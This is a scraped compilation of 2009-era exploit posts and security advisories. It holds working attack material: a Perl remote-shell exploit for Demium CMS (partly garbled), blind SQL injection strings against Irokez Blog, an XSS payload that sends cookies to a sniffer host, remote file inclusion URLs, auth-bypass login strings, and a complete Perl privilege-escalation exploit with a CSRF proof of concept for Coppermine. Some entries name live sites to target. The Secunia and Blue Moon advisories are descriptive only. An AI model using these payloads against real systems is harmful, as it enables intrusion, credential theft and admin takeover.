my $data = "GET ".$url." HTTP/1.1\r\n".
"Host: ".$h0st."\r\n".
"Keep-Alive: 300\r\n".
"Connection: keep-alive\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Cookie: login_user=p0wnin; login_pw=p0wnin\r\n".
"Content-Length: 0\r\n\r\n".
"\r\n";

my $socket = new IO::Socket::INET(
PeerAddr => $h0st,
PeerPort => '80',
Proto => 'tcp',
) or die "[-] Can't connect to $h0st:80\n[?] $! \n\n";

$socket->send($data);

my @tmp_out;
my $stop;
while ((my $e = <$socket>)&&($stop != 1)) {
if ($e =~ /ExeCx0/) {
$stop = 1;
}
push(@tmp_out,$e);
}

$stop == 1 || die "[-] Can't include remote Shell\n\n";

my $re = join '', @tmp_out;
my $content = tag($re);
if ($content =~ /0xExec(.+)\*ExeCx0/) {
my $out = $1;
$out =~ s/\$/ /g;
$out =~ s/\*/\n/g;
chomp($out);
print "$out\n";
&exploit;
}
else {
$c++;
$cmd =~ s/\n//;
print "bash: ".$cmd.": command not found\n";
$c < link =" $_[0];" req =" HTTP::Request-">new(GET => $link);
my $ua = LWP::UserAgent->new();
$ua->timeout(4);
my $response = $ua->request($req);
return($response->content);
}

sub cheek() {
my $host = $_[0];
if ($host =~ /http:\/\/(.+)/) {
return 1;
}
else {
return 0;
}
}

sub get_input() {
my $host = $_[0];
$host =~ /http:\/\/(.+)/;
$s_host = $1;
$s_host =~ /([a-z.-]{1,30})\/(.*)/;
($h0st,$path) = ($1,$2);
$path =~ s/(.*)/\/$1/;
$full_det = $h0st." ".$path;
return($full_det);
}

sub tag() {
my $string = $_[0];
$string =~ s/ /\$/g;
$string =~ s/\s/\*/g;
return($string);
}

sub banner {
print "\n".
" --------------------------- \n".
" Demium CMS RCE sploit \n".
" (SQL-LFI) \n".
" by Osirys \n".
" --------------------------- \n\n";
}

sub help() {
my $error = $_[0];
if ($error == -1) {
&banner;
print "\n[-] Bad hostname! \n";
}
elsif ($error == -2) {
&banner;
print "\n[-] Bad hostname address !\n";
}
print "[*] Usage : perl $0 http://hostname/cms_path\n\n";
exit(0);
}

[/$$$]

# milw0rm

Irokez BLog 0.7.3.2 (XSS/RFI/BSQL) Multiple Remote Vulnerabilities

Application: Irokez Blog
------------
Website: http://irokez.org
--------
Version: All (0.7.3.2)
--------
Date: 11-02-2009
-----

[ BLIND SQL-INJECTION ]

[ SOME VULNERABLE CODE ]

/classes/table.class.php

...
if ($is_trans) {
$query = "select t.*, m.* from {$this->_name} m"
. " left join {$this->_name}{$this->_trans} t on (t.{$this->_item} = m.id)"
. " where m.id = '$id' group by {$this->_lang}";
} else {
$query = "select * from {$this->_name} where id = '$id'";
}
$result = $this->db->exeQuery($query);

===>>> Exploit:

http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1)) between 100 and '115
http://irokez/blog/life/15' and ascii(substring((select concat(login,0x3a,pass) from icm_users limit 0,1),1,1))='114
etc

[ ACTIVE XSS ]

in comments.

[ SOME VULNERABLE CODE ]

/scripts/blog/output-post.inc.php

input id="name" type="text" class="text" name="name" value="">"
label for="name">

input id="email" type="text" class="text" name="email" value="">"
label for="email">

input id="site" type="text" class="text" name="site" value="">"
label for="site">
...
textarea id="message" name="message" class="textarea">>> Exploit:

script img = new Image(); img.src = "http://sniffer/sniff.jpg?"+document.cookie; script

[ INCLUDE ]

[ SOME VULNERABLE CODE ]

/thumbnail.php
...
ob_start();
switch ($module) {
case 'gallery':
include_once $GLOBALS['PTH']['classes'] . 'gallery.class.php';
$Obj = new TBL_Gallery;
$image_path = $GLOBALS['PTH']['gallery'] . getVar($Obj->select($id), 'src');
break;
default:
$image_path = '';
}

===>>> Exploit:

http://irokez/modules/tml/block.tag.php?GLOBALS[PTH][classes]=[include]
http://irokez/scripts/sitemap.scr.php?GLOBALS[PTH][classes]=[include]
http://irokez/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=[include]
http://irokez/spaw/spaw_control.class.php?GLOBALS[spaw_root]=[include]

Author: Eugene "Corwin" Ermakov
-------

Contact: corwin88[dog]mail[dot]ru
--------

# milw0rm

SkyPortal Downloads Manager v1.1 Remote Contents Change Vulnerability

S.Site :http://skyportal.net

Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip

Demo :http://vegtrafikk.net

Vulerability:

http://site.com/ [PATH] /admin_dl_browse.asp
http://site.com/ [PATH] /dl_add_form.asp

vs.. vs.. vs..

Demo:

http://vegtrafikk.net/admin_dl_browse.asp

http://resala2u.com/admin_dl_browse.asp
.com

BannerManager 0.81 (Auth Bypass) SQL Injection Vulnerability

SISTEMA DE BANNER: BannerManager v0.81

http://sourceforge.net/projects/bannermanager

vulnerable: sql injection :)
Found by: rootzig

Greetz: Eviwrite :P

/Banner/default.asp
/[patch]/default.asp

Login: or 1=1
Pass : or 1=1

# milw0rm

Coppermine Photo Gallery <= 1.4.20 (IMG) Privilege Escalation Exploit

#!/usr/bin/perl
#inphex - inphex0 at gmail dot com
#based on http://milw0rm.com/exploits/8114 - found by StAkeR
#In case this does not work check out pos(Line 80) and find another value for it
use IO::Socket;
use LWP::UserAgent;
use LWP::Simple;
use HTTP::Cookies;
$_1 = shift; #[HOST]
$h = ($_1 eq ""?($n = 0):($n = 1));
$_2 = shift; #[PATH]
$_3 = shift; #[ID]
$_4 = shift; #[ALBUMNUM]
$_5 = shift; #[USER]
$_6 = shift; #[PASS]
$d_p = 80;
if (!$_1 || !$_2 ||!$_3 ||!$_4 ||!$_5 ||!$_6) {
print "perl coppermine host /path/ youruserid albumnum yourusername yourpassword\n";
print "perl coppermine host.com /path/ 3 2 inphex 123456";
exit;
}
if ($h) {
$socket = IO::Socket::INET->new(Proto => "tcp",PeerAddr => $_1, PeerPort => $d_p) or die("[-]ERROR");
print $socket "GET $_2 HTTP/1.1\n";
print $socket "Host: $_1\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";

while ($answer = <$socket>) {
$f_answer = $f_answer.$answer;
}
$url = &gen_url($_1,$_2,$_3);
if ($url) {
$code = &gen_code($url);
$res = &_send($_1,$_2,$_3,$_4,$code,$_5,$_6);
}

}

sub gen_url($$$) {
$h = shift;
$p = shift;
$i = shift;
$url = "http://".$_1.$_2."delete.php?id=u".$i."&u".$i."=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no";
return $url;
}
sub gen_code($) {
$url = shift;
$code = "yoyoyo[img]".$url."[/img]";
return $code;
}
sub _send($$$$$$$) {
$h = "http://".shift;
$p = shift;
$i = shift;
$aid = shift;
$co = shift;
$u = shift;
$pass = shift;

$xpl = LWP::UserAgent->new() or die;
$cookie_jar = HTTP::Cookies->new();
$xpl->cookie_jar( $cookie_jar );

$login = $xpl->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);
if($cookie_jar->as_string) {
$c = 1;
print "[+]Connected\n";
print "[+]Logged in\n";
}else {
$c = 0;
}

if ($c) {
$con = get("".$h.$p."displayimage.php?album=".$aid."&pos=0"); #pos may be changed
if ($con =~m/addfav\.php\?pid=(.*?)\&amp/) {
$p_id = $1;

}

}

$se = $xpl->post($h.$p.'db_input.php',Content_Type => 'form-data',
Content => [
'msg_author' => $u,
'msg_body' => $co,
'event' => 'comment',
'pid' => $p_id,
'submit' => "OK",
],);
print "[+]Comment sent\n";
print "[/]Waiting for admin to view\n";
$| = 0;
while (1) {
sleep(20);
syswrite STDOUT,"-";
$xpl1 = LWP::UserAgent->new() or die;
$cookie_jar1 = HTTP::Cookies->new();
$xpl1->cookie_jar( $cookie_jar1 );
$_con = get("".$h.$p."logout.php?referer=index.php");
$login = $xpl1->post($h.$p.'login.php?referer=index.php',
Content => [
"username" => $u,
"password" => $pass,
"submitted" => "Login",
],);

$const = $xpl1->get($h.$p."index.php");
if ($const->as_string =~m/Config/) {
print "\n[+]You just gained Admin Privileges";
exit;
}
}
}

# milw0rm

DesignerfreeSolutions Newsletter Manager Pro Auth Bypass Vulnerability

Author : ByALBAYX

Website : WWW.C4TEAM.ORG

From : Turkish

Script :Newsletter Manager Plus.Attach
S.Site :http://designerfreesolutions.com

Dty :http://designerfreesolutions.com/web/viewitem.asp?idproduct=1025

Demo :http://designerfreesolutions.com/newsletterattach

Price :47.00 USD

Exploit:

Username: ' or '
Password: ' or '

http://c4team.org /Newsletter Manager /admin/index.asp

Demo:

http://www.designerfreesolutions.com/newsletterattach/admin/index.asp

vs..
Greetz For

Str0ke & Kralman & Mrabah12R & K3vin Mitnick & web-terrorist & Silent & SpotGang

Derdimi dinledim, derdimden iGRENDiM...
Onun derdini gordum, derdime iMRENDiM...
FilistiN

# milw0rm

Golabi CMS Remote File Inclusion Vulnerability

Application Info:
Name: Golabi CMS
Author: R3dM0ve
HomePage: http://golabicms.sourceforge.net/
Download: http://downloads.sourceforge.net/golabicms/Golabi_1.0.zip?use_mirror=freefr

Vulnerability Info:
Type: Remote File Inclusion (RFI)
Requirement: register_globals [ON]
Risk: High Critical
Bug Hunter: CrazyAngel
Details: Unhandled variable Inclusion in default template file results in RFI Vulnerability
[*] Vul URL: [GOLABI_PATH]/templates/default/index_logged.php?main_loaded=1&cur_module=[EVIL_URL]

# milw0rm

Coppermine Photo Gallery <= 1.4.20 (BBCode IMG) Privilege Escalation PoC

by Juri Gianni aka yeat - staker[at]hotmail[dot]it
http://coppermine-gallery.net
Don't add me on msn messenger.
This vulnerability can be named as "bbcode img tag script injection"

Proof of Concept (an example,to understand it)

URL: http://[host]/[path]/delete.php?id=u[ID]&u[ID]=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no
[img]URL[/img]

Modify [ID] with your user id.
Go http://[host]/[path]/displayimage.php?album=random&pos=[album id]

Insert the below code into a new message

hey admin,nice web site :)
[img]http://[host]/[path]/delete.php?id=u3&u3=&action=change_group&what=user&new_password=&group=1&delete_files=no&delete_comments=no[/img]

The fake image doesn't show errors,you'll see "hey admin,nice web site". You'll become admin when the real admin will visit the page.

# milw0rm

Orbit Downloader 2.8.2 and 2.8.3 Long URL Parsing Buffer Overflow

1) Affected Software

* Orbit Downloader 2.8.2 and 2.8.3

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Highly critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"Orbit Downloader, leader of download manager revolution, is devoted to new generation web (web2.0) downloading, such as video/music/ streaming media from Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general downloading easier and faster.".

Product Link: http://www.orbitdownloader.com/

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in Orbit Downloader, which can be exploited by malicious people to compromise a user's system.

The vulnerability is caused due to a boundary error when generating the "Connecting" log message for HTTP downloads. This can be exploited to cause a stack-based buffer overflow by e.g. tricking a user into downloading from a malicious HTTP server or opening a specially crafted HTTP URL containing an overly long host name.
Successful exploitation allows execution of arbitrary code.

======================================================================
5) Solution

Update to version 2.8.5.

======================================================================
6) Time Table

21/01/2009 - Vendor notified.
04/02/2009 - Requested status update from vendor.
05/02/2009 - Vendor response.
10/02/2009 - Vendor states that the bug has been fixed and a new
version will be available soon.
25/02/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Stefan Cornelius, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has assigned CVE-2009-0187 for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2009-9/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

Multiple vulnerabilities in OpenSite v2.1

:Severity: Critical
:Reporter: Blue Moon Consulting
:Products: OpenSite v2.1
:Fixed in: to be fixed in 3.0

Description
-----------

OpenSite is an Open Source Content Management System powered by PHP5 and MySQL 4 and is extremely simple and lightweight.

We have discovered six vulnerabilities in OpenSite from authentication bruteforce to SQL injection. Except the first vulnerability rated at critical severity, the rest is of low severity.

1. Weakened authentication.

The function ``init`` in ``origin/libs/user.php`` checks for a matching ``origin_hash`` cookie. However, this cookie can be bruteforced in at most 232 tries for a known username. In reality, the number of attempts could be greatly reduced knowing that we do not have to check for time in the future, and long past.

2. Special characters such as quotes, double quotes, backslashes in password prevent users from logging in.

In ``modules/userregister/index.php``, the argument passed to ``$user->register`` contains and escaped ``$_POST['password']``. In ``origin/libs/user.php``, this password is hashed with ``sha1``. However, the function ``login`` does not escape the POST data before hashing it, causing inconsistency.

3. Double escapes in user registraion.

In ``origin/libs/user.php``, the register function escapes all key=>value pairs before inserting them into the database. However, ``username``, ``password``, and ``email`` have been escaped before being passed to this function. Therefore they are escaped twice.

4. SQL injection in admincp/includes/functions.php.

SQL injection in function ``haspermission``. The parameters ``$module`` and ``$section`` are not escaped. This function is called in ``admincp/usergroups.php``.

5. SQL injection in ``admincp/settings.php``.

SQL injection in processing ``$_POST['do'] == "save"``. The POST data ``settings`` are not properly escaped before saving.

6. SQL injection in ``admincp/usergroups.php``.

SQL injection in all permissions select command ``SELECT id,module,section,groups FROM permissions WHERE module='".$module."' AND section='".$section."' LIMIT 1"``. The POST data ``permissions`` are not properly escaped before use.

Workaround
----------

There is no workaround.

Fix
---

These bugs are planned to be fixed in OpenSite v3.0.

Disclosure
----------

Blue Moon Consulting adapts `RFPolicy v2.0 `_ in notifying vendors.

:Initial vendor contact:

February 24, 2009: Initial contact sent to Jack Polgar.

:Vendor response:

February 24, 2009: Jack replied asking for technical details.

:Further communication:

February 24, 2009: Technical details were sent to Jack, and confirmation was requested.

February 24, 2009: Jack confirmed all problems and stated "most or all of them will be fixed in the next release".

February 24, 2009: Prepared advisory is sent to Jack to co-ordinate the public release.

:Public disclosure: February 25, 2009

:Exploit code: No exploit code is provided.

Disclaimer
----------

The information provided in this advisory is provided "as is" without warranty of any kind. Blue Moon Consulting Co., Ltd disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. Your use of the information on the advisory or materials linked from the advisory is at your own risk. Blue Moon Consulting Co., Ltd reserves the right to change or update this notice at any time.

SHOUTcast 1.9.8 DNAS Relay Server Buffer Overflow

1) Affected Software

* SHOUTcast 1.9.8

NOTE: Other versions may also be affected.

======================================================================
2) Severity

Rating: Less critical
Impact: System access
Where: From remote

======================================================================
3) Vendor's Description of Software

"The SHOUTcast Radio Distributed Network Audio Software (DNAS) is a software application that runs on your server attached to the Internet or an IP network and is responsible for receiving audio from a broadcaster such as your Winamp media player running the SHOUTcast Radio DSP plug-in.".

Product Link:
http://www.shoutcast.com/download

======================================================================
4) Description of Vulnerability

Secunia Research has discovered a vulnerability in SHOUTcast DNAS, which can be exploited by malicious people to compromise a vulnerable system.

The vulnerability is caused due to a boundary error when receiving data from a relay master server. This can be exploited to overflow a static buffer by tricking a SHOUTcast admin into setting up a server to act as relay for a malicious server.

Successful exploitation allows to e.g. overwrite the password of the web administration interface.

======================================================================
5) Solution

Relay trusted servers only.

======================================================================
6) Time Table

09/01/2009 - Vendor notified.
04/02/2009 - Requested status update from vendor.
25/02/2009 - Public disclosure.

======================================================================
7) Credits

Discovered by Stefan Cornelius, Secunia Research.

======================================================================
8) References

The Common Vulnerabilities and Exposures (CVE) project has not yet assigned a CVE for the vulnerability.

======================================================================
9) About Secunia

Secunia offers vulnerability management solutions to corporate customers with verified and reliable vulnerability intelligence relevant to their specific system configuration:

http://secunia.com/advisories/business_solutions/

Secunia also provides a publicly accessible and comprehensive advisory database as a service to the security community and private individuals, who are interested in or concerned about IT-security.

http://secunia.com/advisories/

Secunia believes that it is important to support the community and to do active vulnerability research in order to aid improving the security and reliability of software in general:

http://secunia.com/secunia_research/

Secunia regularly hires new skilled team members. Check the URL below to see currently vacant positions:

http://secunia.com/corporate/jobs/

Secunia offers a FREE mailing list called Secunia Security Advisories:

http://secunia.com/advisories/mailing_lists/

======================================================================
10) Verification

Please verify this advisory by visiting the Secunia website: http://secunia.com/secunia_research/2008-62/

Complete list of vulnerability reports published by Secunia Research:
http://secunia.com/secunia_research/

Apple Safari 4 Beta URI NULL Pointer Dereference Denial of Service Vulnerability

Class: Input Validation Error
Local: Yes
Remote: Yes
Vulnerable Versions:
* Apple Safari 4 (528.16) Public Beta

Note: MacOS X versions not tested.

Description:
Apple Safari is prone to a denial-of-service vulnerability, caused by a NULL pointer defernce bug, because it fails to adequately sanitize user-supplied input within afeeds: URI. Attackers can exploit this issue to cause denial-of-service conditions on a users computer and crash the Safari process.

Any feeds: URI containing one of these characters will cause a denial-of-service condition.

Disclosure:
Vendor has been informed.

Solution:
No solution.

Credit:
Trancer
http://www.rec-sec.com

Cisco ACE Application Control Engine Device Manager and Application Networking Manager Vulnerabilities

This summary is not available. Please click here to view the post.

Multiple Vulnerabilities in the Cisco ACE Application Control Engine Module and Cisco ACE 4710 Application Control Engine